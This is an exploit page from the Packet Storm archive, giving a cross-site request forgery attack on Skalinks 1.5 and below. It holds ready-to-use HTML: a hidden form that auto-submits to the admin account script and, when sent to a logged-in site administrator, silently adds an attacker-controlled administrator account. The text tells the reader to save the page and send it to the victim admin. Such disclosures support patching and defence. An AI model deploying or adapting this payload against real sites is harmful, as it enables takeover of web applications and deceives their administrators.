Skalinks versions 1.5 and below cross site request forgery add administrator exploit.
19b9cf57c717b306fdddcc74be518b8085693f8c11af949c14d4939c790f169f##########################################################################
# _ _ _ _ _____ _ _ #
# | | | | | | (_) |_ _| (_) | | #
# | |_| | __ _ ___| | ___ _ __ __ _ | | _ __ ___ _ __| | ___ #
# | _ |/ _` |/ __| |/ / | '_ \ / _` | | || '_ \/ __| |/ _` |/ _ \ #
# | | | | (_| | (__| <| | | | | (_| | _| || | | \__ \ | (_| | __/ #
# \_| |_/\__,_|\___|_|\_\_|_| |_|\__, | \___/_| |_|___/_|\__,_|\___| #
# __/ | #
# |___/ #
#________________________________________________________________________#
| |
| Site: www.hackinginside.altervista.org |
| Project: Skalinks <= 1_5 Cross Site Request Forgery Add Admin |
| Author: Vincy |
| Email: djvincy@hotmail.it |
|________________________________________________________________________|
This code, must be saved in a HTML page and sended to the site admin. So the admin will add a new admin in the mySQL with that info.
It work only if admin's logged.
-------------------------------------------------------------------------------------------
<form action="http://site.com/path/admin/admin_account.php" name="add_admin" method="post">
<input type="text" name="admin_name" value="[ NOME ]">
<input type="text" name="admin_password" value="[ PASSWORD ]">
<input type="text" name="admin_email" value="[ EMAIL ]">
<select name="admin_type"><option value="2">Super Editor</option></select>
<input type=hidden name="Add_admin" value="Add Admin">
</form>
<script>document.add_admin.submit()</script>
-------------------------------------------------------------------------------------------
# Vincy - Hacking Inside Crew
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed